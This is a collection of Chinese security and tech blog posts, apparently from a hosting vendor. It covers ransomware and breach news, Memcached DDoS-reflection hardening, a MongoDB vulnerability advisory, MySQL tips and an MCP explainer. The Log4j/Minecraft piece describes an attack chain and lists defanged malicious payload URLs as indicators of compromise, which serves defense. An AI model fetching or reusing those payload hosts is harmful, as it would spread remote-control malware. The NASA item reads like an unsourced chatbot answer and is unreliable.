日晚(北京时间今早)发布公告称,MathWorks 遭受了勒索软件攻击。官方已经就此事项通知了执法部门。 此次攻击影响了 IT 系统,一些客户使用的在线应用变得不可用,而员工使用的某些内部系统也变得不可用,问题始于 5 月 18 日星期日。 官方目前已经使许多系统恢复在线,并正在与网络安全专家合作,使其他系统恢复在线。 MathWorks 官方状态页面显示,截至 5 月 24 日,官方的下载服务仍然处于中断状态。 MathWorks 是全球领先的科学计算软件开发商,于1984年成立,总部位于美国马萨诸塞州南博罗市。其旗舰产品 MATLAB 是一款集算法开发、数据分析、可视化和数值计算于一体的编程环境,广泛应用于工程和科学领域,被形象地称为“工程师和科学家的语言”。另一核心产品 Simulink 是一个模块化建模环境,用于多域和嵌入式工程系统的仿真和基于模型的设计,适用于众多工程领域。此外,公司还开发了130多种专业工具箱,支持不同领域的特殊任务。全球数百万工程师和科学家使用其产品,用户遍布航空、汽车、通信、电子、工业、金融、生命科学与医疗、能源等多个行业以及科研教育领域。 #### MCP 服务是什么 MCP(Model Context Protocol,模型上下文协议)是由美国AI公司Anthropic于2024年11月提出并开源的一种开放协议,旨在为大语言模型(LLM)与外部工具、数据源之间提供标准化交互方式,类似于AI领域的“USB接口”或“TCP/IP协议”。其核心目标是解决AI模型与现实世界工具、数据之间的连接问题,推动AI应用的灵活性和实用性。 核心功能与价值 标准化交互MCP定义了一套通用规范,允许任何支持该协议的AI模型通过轻量级“MCP服务器”与外部资源(如数据库、API、生产力工具等)交互。开发者只需按协议开发一次服务,即可被所有兼容MCP的客户端复用,避免了传统开发中为不同模型单独适配的繁琐过程。 扩展AI能力通过MCP,AI模型可突破传统对话限制,直接调用外部工具执行复杂任务。例如: 读取本地文件系统或数据库; 调用Slack收发消息、使用Google Maps获取地理位置; 接入支付服务(如支付宝)完成商业化闭环6; 执行证券交易、资产管理等金融操作(如长桥证券的MCP服务)。 跨模型兼容性MCP独立于特定模型或供应商,支持多模型协同。例如,用户可通过不同模型(如Claude、GPT)调用同一MCP服务,实现工具生态的复用与共享。 实际应用场景 企业服务:龙腾佳讯将企业官网改造为MCP服务化平台,用户通过自然语言即可查询企业信息或提交需求,实现“机器可读”的智能交互。 开发效率提升:阿里云百炼平台提供全生命周期托管的MCP服务,开发者无需编写复杂代码,5分钟即可构建AI Agent应用,例如旅行规划、企业知识库管理。 金融与商业:长桥证券通过MCP让AI直接执行投资分析和股票交易,支付宝则通过MCP服务实现AI驱动的支付功能,推动AI商业化落地。 行业影响与趋势 生态整合加速全球科技巨头(如OpenAI、谷歌、阿里、腾讯)已纷纷支持MCP协议,并构建服务生态。例如,阿里云百炼首批上线50多种MCP服务,覆盖地图、搜索、办公协作等场景。 技术普惠化MCP降低了AI开发门槛,非专业开发者可通过配置化工具快速调用服务。例如,魔搭社区推出MCPBench开源工具,帮助开发者评估和选择服务。 未来潜力行业认为MCP可能成为AI领域的“HTTP协议”,推动AI应用从单一功能向复杂协作转变。例如,组合多个MCP服务完成跨平台任务(如调用地图数据生成PPT)。 挑战与局限 尽管MCP前景广阔,但其应用仍面临深度场景适配不足、专业领域精度有限(如3D建模)等问题,且需依赖生态成熟度。不过,随着标准化推进和巨头投入,MCP有望成为AI与真实世界深度融合的关键基础设施。 #### MCU 大厂 Microchip 遭遇 IT 系统攻击 8 月 21 日消息,根据 MCU 大厂 Microchip 当地时间本月 20 日向美国证券交易委员会 SEC 提交的 Form 8-K 文件,该公司 IT 系统此前遭遇攻击,履行订单的能力因此受到影响。 Microchip 在文件中表示该公司本月 17 日检测到涉及其 IT 系统的潜在可疑活动,并在 19 日确认是未经授权者破坏了 Microchip 对某些服务器的使用和部分业务运营。 Microchip 称其“迅速采取了额外措施处理该事件”:对受影响的系统进行隔离、关闭部分系统、并在外部网络安全顾问的协助下对本次攻击事件展开调查。 由于 IT 系统攻击和随后应对措施的综合影响,Microchip 的部分制造设施运行水平低于平常状态,履行订单能力下降。Microchip 正积极开展事后调查和恢复,但尚未明确本次攻击事件的完整范围、性质与影响。 ▲ Form 8-K 文件核心内容 Microchip 是全球六大主要 MCU 微控制器企业之一,也提供半导体代工服务。其 2024 财年(截至 2024 年 3 月 31 日)营收总额为 76.34 亿美元 #### Memcached DDoS反射攻击防御方法 简介 在2018年2月27日,Cloudflare 和 Arbor Networks 公司于周二发出警告称,恶意攻击者正在滥用 Memcached 协议发起分布式拒绝服务(DDoS)放大攻击,全球范围内许多服务器(包括 Arbor Networks 公司)受到影响。下图为监测到Memcached攻击态势。 美国东部时间28日下午,GitHub透露其可能遭受了有史最强的DDoS攻击,专家称攻击者采用了放大攻击的新方法Memcached反射攻击,可能会在未来发生更大规模的分布式拒绝服务(DDoS)攻击。对GitHub平台的第一次峰值流量攻击达到了1.35Tbps,随后又出现了另外一次400Gbps的峰值,这可能也将成为目前记录在案的最强DDoS攻击,此前这一数据为1.1Tbps。据CNCERT3月3日消息,监测发现Memcached反射攻击在北京时间3月1日凌晨2点30分左右峰值流量高达1.94Tbps。 Memcached 是一个高性能的分布式内存对象缓存系统,用于动态Web应用以减轻数据库负载。它通过在内存中缓存数据和对象来减少读取数据库的次数,从而提高动态、数据库驱动网站的速度。放大攻击针对使用UDP在公共网络上公开的Memcached部署。 为了缓解攻击,最好的选择是将Memcached绑定到本地接口,禁用UDP,并使用传统的网络安全方案保护您的服务器。在本教程中,我们将介绍如何执行此操作,以及如何将服务公开给外部客户端。 在Ubuntu和Debian服务器上保护Memcached 对于在Ubuntu或Debian服务器上运行的Memcached服务,您可以通过编辑/etc/memcached.conf文件调整服务参数,例如: sudo nano /etc/memcached.conf 默认情况下,Ubuntu和Debian将Memcached绑定到本地127.0.0.1端口。受限制的安装127.0.0.1不容易受到来自网络的放大攻击。 . . . -l 127.0.0.1 . . . 那么禁用UDP也是一个好主意,这更有可能被这种特殊攻击利用。要禁用UDP,请将以下内容添加到底部或文件中: . . . -U 0 完成后,保存并关闭文件。 重新启动Memcached服务以应用更改: sudo service memcached restart 通过输入以下内容验证Memcached当前是否绑定到本地接口并仅侦听TCP: sudo netstat -plunt Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name . . . tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN 2383/memcached . . . 您应该看到仅使用TCP memcached绑定到127.0.0.1。 在CentOS和Fedora服务器上保护Memcached 对于在CentOS和Fedora服务器上运行的Memcached服务,您可以通过编辑/etc/sysconfig/memcached文件来调整服务参数,例如: sudo vi /etc/sysconfig/memcached 我们希望绑定到本地网络接口,使用-l 127.0.0.1选项限制到同一台计算机上的客户端的流量。我们还将设置-U0禁用UDP协议。 在OPTIONS变量中添加这两个参数: PORT="11211" USER="memcached" MAXCONN="1024" CACHESIZE="64" OPTIONS="-l 127.0.0.1 -U 0" 完成后保存并关闭文件。 要应用更改,请重新启动Memcached服务: sudo service memcached restart 通过输入以下内容验证Memcached当前是否绑定到本地接口并仅侦听TCP: sudo netstat -plunt Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name . . . tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN 2383/memcached . . . 您应该看到仅使用TCP memcached绑定到127.0.0.1。 允许通过专用网络访问 上面的步骤告诉Memcached只能侦听本地接口。这可以通过不将Memcached接口暴露给外部各方来防止放大攻击。如果您需要允许从其他服务器访问,则必须调整配置。将Memcached绑定到专用网络端口。 使用防火墙限制IP访问 在执行此操作之前,最好设置防火墙规则可以连接到Memcached服务器的计算机。您需要知道您客户端的IP地址以方便配置防火墙规则。 如果您使用的是UFW防火墙,则可以通过输入以下内容来限制对Memcached实例的访问: sudo ufw allow OpenSSH sudo ufw allow from client_servers_private_IP/32 to any port 11211 sudo ufw enable 如果您使用的是Iptables,则可以通过输入以下内容来建立基本防火墙: sudo iptables -A INPUT -i lo -j ACCEPT sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT sudo iptables -A INPUT -p tcp -s client_servers_private_IP/32 --dport 11211 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT sudo iptables -P INPUT DROP 然后,您可以调整Memcached服务绑定到服务器的专用网络接口。 将Memcached绑定到专用网络接口 现在您的防火墙已就位,您可以调整Memcached配置以绑定到服务器的专用网络接口,而不是127.0.0.1。 对于Ubuntu或Debian服务器,请再次打开/etc/memcached.conf文件: sudo nano /etc/memcached.conf 在里面,找到该-l 127.0.0.1行并更改地址以匹配您服务器的专用网络接口: . . . -l memcached_servers_private_IP . . . 完成后保存并关闭文件。 对于CentOS和Fedora服务器,请再次打开/etc/sysconfig/memcached文件: sudo vi /etc/sysconfig/memcached 在里面,更改变量-l 127.0.0.1中的OPTIONS参数以引用Memcached服务器的私有IP: . . . OPTIONS="-l memcached_servers_private_IP -U 0" 完成后保存并关闭文件。 接下来,再次重新启动Memcached服务: sudo service memcached restart 检查新设置netstat以确认更改: sudo netstat -plunt Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name . . . tcp 0 0 memcached_servers_private_IP:11211 0.0.0.0:* LISTEN 2383/memcached . . . 建议您最好还是检查来自未授权客户端的访问权限,以确保防火墙规则有效。 结论 Memcached放大攻击会严重影响网络运行状况和服务的稳定性。但是,通过运行服务器的安全设置,可以有效地减轻攻击。应用本教程中的更改后,最好继续监控您的服务,以确保维护正常的功能和连接。 应对逐步升级的DDoS攻击风险,我们还是建议配置百度云加速高防CDN,隐藏源站IP。用高防CDN充足的带宽资源应对可能的大流量攻击行为,并根据业务特点制定个性化的防护策略,被DDoS攻击时才能保证业务可用性,从容处理。在面对高等级DDoS威胁时,及时升级防护配置,必要时请求DDoS防护厂商的专家服务。 #### Memcache高危分布式反射拒绝服务漏洞 漏洞描述 近日,利用Memcache作为放大器进行放大的DDoS攻击,引发广泛关注。其利用memcached协议,发送大量带有被害者IP地址的UDP数据包给放大主机,然后放大主机对伪造的IP地址源做出大量回应,从而形成DRDoS(分布式反射拒绝服务)攻击。 关于DDoS反射攻击: 攻击者,伪造被攻击目标IP,发送海量伪造请求到反射服务器。 反射服务器,需要满足2个条件,第一,上面运行存在漏洞名的UDP协议服务,能够满足特定条件下,响应包远远大于请求包。第二,该协议或服务在互联网上有一定的使用量,如DNS,NTP等基础服务。 关于Memcache反射: 由于Memcache同时监听TCP和UDP,满足反射DDoS条件。 Memcache作为企业应用组建,具有较高外发带宽。 Memcache不需要认证即可进行交互。 很多用户在编译安装时,将服务错误监听在0.0.0.0,且未进行安全策略配置。 漏洞影响 对外开放的Memcache服务 漏洞等级 高危 影响分析 修复建议 1、Memcache的用户建议: 在不使用UDP的情况下禁用UDP支持,在memcached启动时,您可以指定--listen 127.0.0.1仅侦听本地主机并-U 0完全禁用UDP。 将服务放置于内部网络内,确实有外网访问需求设置ACL。 2、ISP服务商基于网络针对UDP协议的11211端口进行速率限制。 #### microsoft edge浏览器顶部小窗口怎么取消 偶然一次机会使用edge浏览器,不知道点错了什么,顶部打开网页总会有一个小窗口,非常的难看,不知道怎么取消. 于是网上找了下,总于找了解决办法,原来只需要点浏览器顶部的+ 号旁边的“^”图标即可收缩起来了,如下图 #### Microsoft.com等微软系网站被发现存在子域劫持问题 NIC.gp 的安全研究员和开发人员 Michel Gaschet 于近日提出,Microsoft 在其数千个子域的管理方面存在问题,存在有许多子域可以被劫持并用于攻击用户、员工或显示垃圾内容。据 ZDNet 报道称,Gaschet 在接受其采访时说,在过去三年中,他一直在向 Microsoft 报告带有错误配置的 DNS 记录的子域,但该公司要么忽略报告,要么就是默默地保护某些子域。 Gaschet 表示,他已经在 2017 年向微软报告了 21 个容易受到劫持的 msn.com 子域 [1, 2],并在 2019 年报告了 142 个错误配置的 microsoft.com 子域 [1, 2]。此外,他还分享了其于去年向微软报告的 117 个 microsoft.com 子域列表。 图片: ZDNet Gaschet 透露,在其报告的所有错误配置的子域中,微软仅解决了其中的几个,被修复的数量占比只有他所报告数量的 5%-10% 左右。并称,该操作系统制造商通常会修复较大的子域,例如 cloud.microsoft.com 和 account.dpedge.microsoft.com,却使其他子域暴露在劫持之下。 他还表示,大多数 Microsoft 子域在其各自的 DNS 条目中容易受到基本错误配置的攻击。Gaschet 称,“根本原因/错误是忘记了 DNS 条目,指向不再存在或根本不存在的内容,例如 DNS 条目内容中的错字。” Gaschet 在 Twitter 上指出,至少有一个垃圾邮件小组已经发现了他们可以劫持 Microsoft 的子域,并通过将其托管在信誉良好的域中来增加其垃圾内容。并表明,他已在至少四个合法的 Microsoft 子域中发现了印度尼西亚扑克赌场的广告,分别为 portal.ds.microsoft.com、perfect10.microsoft.com、ies.global.microsoft.com 和 blog-ambassadors.microsoft.com。 目前,ZDNet 已向微软征求意见,并要求该公司在当日的 Twitter 话题中对 Gaschet 提出的一系列问题发表评论。 Gaschet 在 Twitter 上猜测,微软不优先解决这些问题的原因之一是因为“subdomain takeovers”不属于公司的漏洞悬赏计划的一部分,这意味着即使所报告的问题很严重,这些报告也不会得到优先处理。 同时,Gaschet 敦促微软改变其管理 DNS 记录的方式。并称,这是造成这些错误配置的主要原因。 #### Minecraft(我的世界)玩家遭大规模攻击 2021年12月9日晚,开源项目ApacheLog4j 2的一个远程代码执行漏洞的利用细节被公开。随后该事件迅速发酵,横扫大半个互联网,由于Log4j属于java日志记录的常用基础组件,被广泛使用,所以受灾面也在迅速扩大。在各大厂商忙于打补丁的这个周末,360安全大脑也检测到了大量针对个人用户的攻击事件,其中MinecraftJava版便是其中之一。 针对游戏玩家的攻击 360安全大脑监测到,有黑客疑似利用最新曝光的log4j2漏洞对Minecraft玩家发起攻击。攻击最早发生于12月10日,早期攻击规模较小,第一天检测到的受攻击玩家数量在100左右。12月11日12时起,黑客发起大规模攻击,从12时开始到目前,平均每小时有近5000个Mincraft玩家遭到攻击,攻击最高峰时有超过10000个玩家遭到攻击。 受害玩家数量变化趋势 网上也出现有该漏洞利用的攻击演示,仅仅在游戏的在线聊天中,发送一条带漏洞触发指令的消息,就可以对收到这条消息的用户发起攻击,攻击发起非常容易。 在漏洞利用成功后,黑客通过漏洞触发远程代码执行,之后利用本机的mshta下载并执行远程hta文件。 受攻击机器进程链 该hta文件实际是个用cactusTorch框架生成的远控木马,利用该木马,攻击者就可以完全控制当前用户的电脑。 此次攻击的部分IOC hxxp://114.132.231.19/A.hta hxxp://114.132.231.19/O.hta hxxp://114.132.231.19/2.hta hxxp://114.132.231.19/OK1.hta hxxp://114.132.231.19/OK1.hta hxxp://114.132.231.19/hfs.exe cc.wdnmdnmsl.xyz 解决方案 对于Minecraft漏洞问题,厂商也紧急发布了修复版本和修复建议。主要内容如下: 1.使用官方版本的,尽快升级最新版本,可以通过重启游戏来升级。2.非官方版本的,注意第三方的升级信息。3.使用Java版服务器的,升级版本到1.18.1 官方详细建议地址: https://www.minecraft.net/zh-hans/article/important-message--security-vulnerability-java-edition 对于此次攻击事件,广大普通用户,也应该尽快对个人电脑进行加固。360安全大脑在此也给出如下安全建议: 临时应急方案 修改Log4j配置: log4j2.formatMsgNoLookups=True 设置JVM启动参数: -Dlog4j2.formatMsgNoLookups=true 设置环境变量: FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS值为true 360安全大脑防护 已安装了360客户端的用户,得益于360安全大脑强大的云端智能识别能力,无需升级即可正常识别并拦截此类攻击。 同时360还更新了高危漏洞免疫工具,在360.cn官网可以下载绿色版本直接运行,通过漏洞免疫缓解类似攻击。 #### MongoDB爆发“MongoBleed”漏洞(CVE-2025-14847):无需认证即可远程执行代码与内存泄露,请立即升级! 漏洞编号: CVE-2025-14847漏洞别名: MongoBleed威胁等级: 严重影响范围: MongoDB 3.6 至 8.2.3 之间的广泛版本核心风险: 攻击者无需任何身份凭证,即可远程执行任意代码并读取服务器内存敏感信息。 一、漏洞深度剖析:为何“MongoBleed”如此危险? 根据Aikido安全数据库及官方通告,CVE-2025-14847是一个存在于MongoDB网络协议处理中的严重安全缺陷。其危险之处在于构建了一条“完美”的攻击链: 攻击前置,绕过一切认证:该漏洞在消息解压阶段、身份验证之前即可被触发。这意味着,只要您的MongoDB服务端口(默认27017)暴露在网络上,攻击者无需知道数据库的用户名和密码,就可以直接发动攻击。 双重杀伤:RCE + 内存信息泄露:成功利用此漏洞,攻击者不仅能实现远程代码执行(RCE),完全控制数据库服务器,还能读取未初始化的内存片段。这可能导致数据库连接凭证、会话密钥或其他应用程序敏感数据意外泄露,造成“二次伤害”。 触发条件常见:仅需服务端启用了zlib压缩(一种常见配置),漏洞即存在被利用的可能。 简单来说,这相当于数据库的“大门”在查验客人身份之前,门框本身就已经腐烂,允许攻击者直接拆墙而入。 二、影响版本清单:请立即核对 您的MongoDB若为以下任何版本,均处于风险之中: 8.2 系列: 8.2.0 至 8.2.3 8.0 系列: 8.0.0 至 8.0.16 7.0 系列: 7.0.0 至 7.0.26 6.0 系列: 6.0.0 至 6.0.26 5.0 系列: 5.0.0 至 5.0.31 4.4 系列: 4.4.0 至 4.4.29 4.2 系列: 所有版本 4.0 系列: 所有版本 3.6 系列: 所有版本 三、紧急修复与缓解方案 方案一:根本解决——立即升级(强烈推荐) MongoDB官方已发布修复版本,请尽快将您的数据库升级至以下或更高版本: MongoDB 8.2.3 MongoDB 8.0.17 MongoDB 7.0.28 MongoDB 6.0.27 MongoDB 5.0.32 MongoDB 4.4.30 升级前务必做好完整的数据备份和变更评估。 方案二:临时缓解措施(若无法立即升级) 如果因业务原因无法马上升级,请立即实施以下“止血”措施,以降低风险: 禁用zlib压缩:修改MongoDB配置文件,将网络消息压缩器改为snappy、zstd或直接none(不启用压缩)。 # 在配置文件中修改 net: compression: compressors: snappy # 或 zstd, 或完全移除compressors配置项 修改后重启MongoDB服务。 实施严格的网络隔离:这是当前最有效的临时防护。 防火墙/安全组策略:立即检查并确保MongoDB的27017等端口绝不直接对公网(0.0.0.0/0)开放。仅允许确有必要访问的、受信任的服务器IP(如您的应用服务器)访问。 云环境操作:在阿里云、腾讯云、华为云等控制台,检查安全组规则。在自建机房,配置iptables或firewalld规则。 最小化暴露面:全面审查并移除任何不必要的、将MongoDB服务暴露在公网的配置(如错误的NAT、DMZ区部署等)。 四、站长视角:从漏洞反思纵深防御体系 MongoBleed漏洞再次敲响警钟:任何将数据库服务直接暴露在公网的行为,都等同于在悬崖边行走。 即便没有此漏洞,数据库也存在被暴力破解、其他0day攻击的风险。 构建安全的服务器架构,应遵循以下原则,并匹配我们的核心产品进行加固: 1. 网络层隐身与访问控制:【高防IP】/【高防服务器】 场景:您的业务必须对外提供Web服务,但后端数据库绝对不应被公网探测到。 解决方案:将业务部署于高防服务器或使用高防IP。这些产品不仅提供DDoS防护,更重要的是,它们可以帮助您构建隐藏真实服务器IP的架构。数据库应置于完全隔离的内网段,仅通过前端应用服务器访问,从根源上切断外部直接攻击数据库的路径。 2. 应用层深度过滤:【百度云防护WAF】 场景:即使数据库内网部署,攻击者也可能通过Web应用漏洞(如SQL注入)进行“曲线救国”。 解决方案:在Web应用前端部署云WAF。它能有效拦截针对应用层的攻击尝试,防止攻击者利用Web漏洞进一步渗透至内网数据库,为您的数据增加一道关键缓冲。 3. 基础安全合规:【SSL证书】与定期更新 确保所有网络通信(包括与数据库的连接,如果必须远程管理)使用加密通道。 建立定期的组件更新机制,如本文所见的紧急更新,是安全运维的底线。 结语 CVE-2025-14847是一个典型的、可导致业务“瞬间沦陷”的高危漏洞。请所有使用受影响MongoDB版本的企业和开发者立即行动,优先采用升级方案,或严格落实临时缓解措施。 安全是一个体系,而非单点。 在修复此单一漏洞的同时,正是审视和加固您整体服务器安全架构的最佳时机。 (本文信息来源于MongoDB官方安全通告及权威安全平台,主机帮博客提供解读与加固建议。具体升级操作请参考官方文档,并在测试环境充分验证。) #### MX优先级是什么意思?在百度云加速如何配置MX记录 MX优先级,用来指定邮件服务器接收邮件的先后顺序(1-50),一般默认设置为5、10、15等(数值越小优先级越高)。 如果您的邮件服务商提供了MX记录对应的记录值,请填写邮件服务商提供的对应记录,否则可能会出现收发错误的情况。 MX记录不能配置加速,否则将无法正常收发信件。 注:只有MX记录有MX优先级。 #### MySQL 8.0 明年停止支持,全球约 58% 实例仍运行该版本 据科技媒体 BornCity 11 月 26 日报道,开源数据库 MySQL 8.0 将于 2026 年 4 月 30 日终止官方支持。然而数据库服务商 Percona 统计显示,目前仍有约 58% 的 MySQL 实例运行于该版本,大量应用系统面临潜在安全威胁。 Percona 公司专家 Peter Zaitsev 对此发出紧急提醒,呼吁各机构技术负责人高度重视此问题,尽快制定升级或迁移计划。 更值得关注的是,统计数据显示仍有 18.8% 的实例在使用已于 2023 年结束支持的 MySQL 5.7 版本。这些长期未更新的数据库系统构成了严重的安全隐患,极易成为网络攻击的突破口。 针对部分用户对升级复杂度的担忧,Zaitsev 特别强调,从 MySQL 8.0 升级至当前最新稳定版 8.4 的过程已大幅简化,远低于此前从 5.7 升级至 8.0 的工作量,这为受影响用户提供了一条相对平滑的升级路径。 #### MySQL 数据库被爆一个存在20多年的高危漏洞一直未修复 6 月 26 日消息,科技媒体 DevClass 近日发布博文称 MySQL 中的一个严重漏洞自 2005 年报告以来 20 年未修复,引发社区对数据库完整性的担忧,也促使一些开发者转向使用 PostgreSQL。 该漏洞追踪编号为 11472,可追溯到 2005 年 6 月,被标记为“S2(Serious)”级别,截至目前为止,仍未被修复。 该漏洞描述为“更新 / 删除 foreign key 后未执行触发器”,触发器是一种在特定表(table)上发生插入、更新或删除事件时自动运行的代码,通常用于确保数据完整性。该漏洞显示,在间接更新表后,由于其中关联到其它表,触发器将不会执行。 在漏洞报告发布后不久,开发团队表示这是一个“已知问题”,并将在 5.1 版本中修复,但最终并未修复。 开发者们在漏洞报告中提到,这个漏洞“严重威胁到 ACID / 数据完整性”,2015 年时还有开发者表示,“在尝试在级联删除上实现触发器后,我们开始遭遇这个问题。请修复这个问题,非常感谢。”ACID 代表原子性、一致性、隔离性和持久性。 Reddit 上的讨论包括关于使用触发器来确保数据库完整性是否为最佳实践的辩论,以及一个常见的回应:“解决方法不是使用 MySQL,而是使用一个合理的关系数据库。”最常见的选择是 PostgreSQL。 根据 DB-Engines 的排名,MySQL 的受欢迎程度近些年来一直持续下降,但它仍然是仅次于 Oracle 的第二大主流数据库管理系统,领先于排名第三的 Microsoft SQL Server,排在第四的是PostgreSQL数据库。 #### mysql-bin.000020 是什么呀 可以删除吗? 最近一直在弄网站的事情,无意中在宝塔里发现服务器网盘快满了,但是查了下,这边网站带个备份数据也才2G多,怎么会满呢? 查询文件目录发现/www/server/data占用大小高达17G!进去一看都是类似mysql-bin.000020这样的文件,每个文件高达1G多,足足十几个文件,怪不得占满网盘了。 查了下这是什么鬼东西? 原来这是mysql的二进制操作日志,详细记录了mysql的运行情况,如果你的网站每天操作很多的,就会出现日志非常大的情况。 正常来说,产生的日志最好不要删,因为这些日志文件是可以用来恢复数据库的,一但遭到什么数据库丢失事件,这个日志文件就非常重要了。 但对我们小网站来说,每天都有做数据库备份了,所以不需要mysql日志文件,那就删了吧。 进入宝塔软件商店,找到MySQL ,点击进入设置,找到日志,关闭二进志日,清空错误日志即可清除。   #### mysql占cpu资源非常大,如何查看当前执行sql语句连接 mysql占用资源比较大时,需要登陆查看执行的sql来分析,windows和linux语法都是一样的。 mysql -uroot -p   #回车 输入root密码,然后再输入 show full processlist; 数据库执行查询比较慢时,可以用此方法列出执行的sql语句,然后用explain命令来查看语句执行效率,主要看数据量和执行效率,根据实际情况确定cname是否建立索引。 phpmyadmin也可以查看当前执行的语句连接,如图所示登陆以后点击“状态”-“进程”。 #### mysql安装图解 windows安装mysql方法 随着MYSQL版本的更新以及电脑系统的变化,我们给大家整理了各种电脑环境下安装MYSQL的图解过程,希望我们整理的内容能够帮助到大家:                   编辑者:Vocabulary下面详细介绍5.6版本MySQL的下载、安装及配置过程。图1.1 MySQL5.6目前针对不同用户,MySQL提供了2个不同的版本:Ø        MySQL Community Server:社区版,该版本完全免费,但是官方不提供技术支持。Ø        MySQL Enterprise Server:企业版,它能够高性价比的为企业提供数据仓库应用,支持ACID事物处理,提供完整的提交、回滚、崩溃恢复和行级锁定功能。但是该版本需付费使用,官方提供电话及文档等技术支持。目前最新的MySQL版本为MySQL 5.6,可以在官方网站http://dev.mysql.com/downloads/下载该软件。下图1.2所示的MySQL官网上单击图片上的“Download”超链接 或 点击左边标记处,然后按照提示一步步操作就可以将MySQL软件下载到本地计算机中了。注意这里我们选择的是数据库版本是“Windows (x86, 32-bit), MSI Installer”,如下图1.3所示。图1.2 MySQL官方网站图1.3 选择MySQL版本Ø        当点击download后会弹出如下页面:        注:下载MySql要求注册:<用户可注册或不注册>,如果不想注册就点击左下角标记处—点击后就弹出如图中下载提示->点击保存文件开始下载。Ø        MySQL下载完成后,找到下载到本地的文件,按照下面所示的步骤双击进行安装:步骤1:双击MySQL安装程序(mysql-installer-community-5.6.10.1)会弹出如下图1.4所示:图1.4 MySQL欢迎界面步骤2:单击图1.4中的“Install MySQL Products” 文字,会弹出的用户许可证协议窗口,如下图1.5所示:图1.5 用户许可证协议窗口步骤3:选中“I accept the license terms” 的前面的选择框,然后点击【Next】按钮,会进入查找最新版本界面,效果如下图1.6所示:图1.6 查找最新版本窗口步骤4:单击【Execute】按钮,会进入安装类型设置界面,效果如下图1.7所示。图1.7 安装类型设置窗口表1-1 安装类型界面各设置项含义 选项 含义 Developer Default 默认安装类型 Server only 仅作为服务器 Client only 仅作为客户端 Full 完全安装类型 Custom 自定义安装类型 Installation Path 应用程序安装路径 Data Path 数据库数据文件的路径 步骤5:选择图1.7中的“Custom”选项,可修改安装路径或保持默认值,然后单击【Next】按钮,弹出功能选择界面,如下图1.8所示。图1.8 功能选择窗口步骤6:单击【Next】按钮,弹出安装条件检查界面,如下图1.9所示。图1.9 安装条件检查界面步骤7:单击【Next】按钮,进行安装界面,如下图1.10所示。图1.10 程序安装界面步骤8:单击【Execute】按钮,开始安装程序。当安装完成之后安装向导过程中所做的设置将在安装完成之后生效,如下图1.11所示的窗口图1.11 程序安装成功界面步骤9:单击【Next】按钮,会进入服务器配置页面,效果如下图1.12所示。图1.12 服务器配置页面步骤10:单击【Next】按钮,效果如下图1.13所示。图1.13 配置页面一图1.13中的“Server Configuration Type”下面的“Config Type”下拉列表项用来配置当着服务器的类型。选择哪种服务器将影响到MySQL Configuration Wizard(配置向导)对内存、硬盘和过程或使用的决策,可以选择如下所示的3种服务器类型:Ø        Developer Machine(开发机器):该选项代表典型个人用桌面工作站。假定机器上运行着多个桌面应用程序。将MySQL服务器配置成使用最少的系统资源。Ø        Server Machine(服务器):该选项代表服务器,MySQL服务器可以同其它应用程序一起运行,例如FTP、email和web服务器。MySQL服务器配置成使用适当比例的系统资源。Ø        Dedicated MySQL Server Machine(专用MySQL服务器):该选项代表只运行MySQL服务的服务器。假定运行没有运行其它应用程序。MySQL服务器配置成使用所有可用系统资源。作为初学者,选择“Developer Machine”(开发者机器)已经足够了,这样占用系统的资源不会很多。在Enable TCP/IP Networking左边的复选框中可以启用或禁用TCP/IP网络,并配置用来连接MySQL服务器的端口号,默认情况启用TCP/IP网络,默认端口为3306。要想更改访问MySQL使用的端口,直接在文本输入框中输入新的端口号即可,但要保证新的端口号没有被占用。步骤11:单击【Next】按钮,在图1.13所对应的界面中,我们需要设置root用户的密码,在“MySQL Root password”(输入新密码)和“Repeat Password”(确认)两个编辑框内输入期望的密码。也可以单击下面的【Add User】按钮另行添加新的用户。(注:Current Root Password:为空;如果输入密码了在后面安装会报错)以下是成功添加用户图1.13 配置页面二步骤12:单击【Next】按钮,设置Windows Service Name<可默认>,此名为启动数据库服务名,要记住。效果如下图1.14所示。图1.14 配置页面三步骤13:单击【Next】按钮,打开配置信息显示页面,如下图1.15所示。Next点击图1.15 配置信息显示页面步骤14:单击【Next】按钮,即可完成MySQL数据库的整个安装配置过程。之后启动数据库服务命令再打开任务管理器,可以看到MySQL服务进程mysqld.exe已经启动了,如1.16所示。在开始菜单栏->附件->右键命令提示符->以管理员身份运行:net start MySQL56 为启动数据库服务命令;net stop MySQL56 为停止数据库服务命令。图1.16 任务管理器窗口Ø        到此为止,我们已经在Windows上顺利的安装了MySQL。 接下来就可以启动MySQL服务与登录数据库进行自己的操作了。 #### MYSQL数据库导入错误提示:/*!40101 SET NAMES utf8mb4 */;解决办法 mysql 导入错误 /*!40101 SET NAMES utf8mb4 */; 原因数据库不支持utf8mb4 解决办法,用Notepad++打开要导入的数据库文件,找到: /*!40101 SET NAMES utf8mb4 */; 更改成 /*!40101 SET NAMES utf8 */; 保存更改后的数据库,再重新导入即可成功。 #### NASA 用 WordPress 做了个网站,竟花了上百万美金 NASA WordPress网站成本 您提到的NASA使用WordPress建立的网站确实涉及了相当高的成本。根据搜索结果,这个项目耗时18个月,涵盖了网站开发、数据迁移和内容建设等多个方面。整个项目的总花费达到了百万美元的规模。这个成本可能对于一般的WordPress网站来说显得异常高昂,但考虑到NASA的特殊需求,例如高安全性、大量的数据处理和复杂的内容管理系统,这样的预算可能是合理的。 项目预算与开发成本 对于一个大型机构如NASA来说,网站项目的预算通常会包括设计、开发、测试、安全性审查、用户体验优化、以及后续的维护和更新等多个方面。这些因素都可能导致整体成本的增加。特别是当从一个CMS系统迁移到另一个CMS系统时,如从Drupal迁移到WordPress,这个过程需要额外的技术支持和时间投入,从而增加了成本。 网站开发成本对比 一般来说,建立一个WordPress网站的成本可以从几百美元到几万美元不等,这取决于网站的复杂程度和功能需求。对于NASA这样的大型网站项目,成本自然会更高,因为它们需要定制开发、特殊的安全措施、以及可能的系统集成等。 结论 